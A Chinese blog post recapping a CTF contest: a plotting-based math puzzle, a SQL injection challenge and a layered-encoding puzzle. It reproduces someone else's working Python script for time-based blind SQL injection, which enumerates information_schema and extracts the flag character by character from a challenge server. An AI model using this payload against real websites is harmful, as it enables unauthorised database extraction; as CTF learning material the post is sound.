首页 > 其他分享 >2024-7-21巅峰极客

2024-7-21巅峰极客

时间:2023-07-22 09:44:23浏览次数:40  
标签:information 极客 21 2024 flag sql table select schema

菜鸡打ctf,做了一天牢,算上签到题一共做上两道

签到

 

 数学但高中

 给出了一大串,一开始没看懂,学姐提醒才知道要画图

python太菜,只好手动一个一个粘

公式画图网址:https://www.desmos.com/calculator?lang=zh-CN

最后生成的图片:

 然后试了半天sql没注进去,大佬的代码也没看懂

 1 import requests
 2 
 3 # sql = "select group_concat(table_name) from information_schema.tables where table_schema=database()" #Flllag
 4 # sql = "select group_concat(column_name) from information_schema.columns where table_name='Flllag' and table_schema=database()" #Flagg
 5 sql = "select group_concat(Flagg) from Flllag"
 6 j = 36
 7 flag = "flag{h3Ltx545LiDwpjQ8Ij1x241wIxS4fa"
 8 
 9 
10 while True:
11     for i in range(32, 128):
12         burp0_url = "http://web-bd1bbd084b.challenge.xctf.org.cn/index.php?id=1'||case+when(ascii(substr(({}),{},1))={})then(select sum('1')from information_schema.tables A,information_schema.columns B,information_schema.columns C)end-- ".format(sql, j, i)
13         print burp0_url
14         try:
15             requests.get(burp0_url, timeout=3)
16             if i == 127:
17                 j = -1
18         except:
19             flag += chr(i)
20             print flag
21             j += 1
22             break
23 
24     if j == -1:
25         print flag
26         exit(0)

还有个song,学姐拿到了个flag.txt,但是要密码

 打开是这样的:

 整了半天没搞明白是什么东西,搜了半天感觉跟pdf的图片扫出来的文字很像

 

 结果最后看大佬wp发现是base85+64+62+58+32

 这个32不太好使,换一个

 剩下的看不懂,等会接着坐牢去了

 大佬wp:https://mp.weixin.qq.com/s/DvRYMkFSr9SFqt_M0f8umg

标签:information,极客,21,2024,flag,sql,table,select,schema
From: https://www.cnblogs.com/theskyforfly/p/17572448.html

相关文章

  • 2023.7.21
    今天和室友约好早起去跑步了五点半起床 !体验了一下早起的世界,其实外面当时天已经亮了,而且路上已经有了很多人然后和室友打着语音一边唠嗑一边慢跑其实还是蛮开心的,虽然起床很痛苦……明天继续!......
  • 关于高精度计算的研究(1)——高精度加、减运算(2023-07-21)
    1、引入在C++中,我们常会需要做加减乘除等等运算首先我们来熟悉一下c++的计算符号:+(加号)             -(减号、负号)                  *(乘号)                    /(除号......
  • 7.21 后记
    我的图逃走了考试T1瞎搞题(老师认证)T2矩阵找最大环,可以推出一个只含两个点3个坐标的式子,\(O(n^3)\)找最大值,再枚举剩下一个点\(n*m\le2e5\),说明\(n\)或\(m\)小于400,\(O(n*m+400)\)可以允许T3做法好想,但缩点+分数规划+树形dp毒瘤,改不动T4括号序列,难难难下......
  • 《摆与混》第十九章--7月21日--周五
    明天就是周末,我闻到了些许畅快1.今天做了什么:今天9点起床(好耶)。洗漱后,简单吃了个早饭(肉丝粉,比我妈做的好吃),上午正常学习,又看了会小说,下午去解救了一下电动车被拖走的哥们(笑死我了,小丑一个),5点半出发健身锻炼(坚持),晚上看比赛加上经典PTA,大计划周末篇!!!2.解决了什么问题:Java课程推进,PT......
  • 7-21打卡
    publicclassHanoiTower{publicstaticvoidmain(String[]args){intn=3;//圆盘的数量charfrom='A';//起始柱子charaux='B';//辅助柱子charto='C';//目标柱子solveHanoi(n,from,a......
  • 7月21日
    7月21日今天早上七点多起的床,起来的时候就开始下雨了,盼星星盼月亮终于下雨了。上午下雨就在家呆着了,早上歇了一会儿打了会儿游戏,然后就帮着一块包饺子了,过了一会儿刷了会儿科目一的题,然后开始吃饭,完事之后就开始午休,睡了一会儿,等醒了之后就开始写pta上的题,然后看了会儿黑马程序员......
  • 7.21
    今天上午建好了那个程序设计的小组群,感觉还是不太舒服睡了一上午下午睡到三点起来玩了一会就去练车去了晚上看了一会大道至简,看了一多半了马上就能写读后感了还打了一会代码#include<iostream>#include<cctype>#include<cstring>usingnamespacestd;boolisnum(string......
  • 7.21语言结构学习
    语言结构学习第一题,答案;第二题,答案写,第一题,答案多少;第二题,答案多少......
  • 20230721巴蜀暑期集训测试总结
    T1似乎想复杂了。搓了一个\(O(Q\sqrt{n\logn})\)的做法,成功跳过正解。结果考后发现普通分块就可以\(O(Q\sqrtn)\)。而且似乎还WA了一些点。根据题意可以发现\(b_i\)为\(1\)当且仅当\(i\)在二进制下有奇数个\(1\)。这个可以用来快速求\(b_i\)。再观察性质,发现\(......
  • 7.21
    package获取字符串信息;publicclass获取字符串长度{publicstaticvoidmain(String[]args){char[]a=newchar[10];Stringstr=newString(a);System.out.println(str.length());//获取字符串长度}}package获取字符串......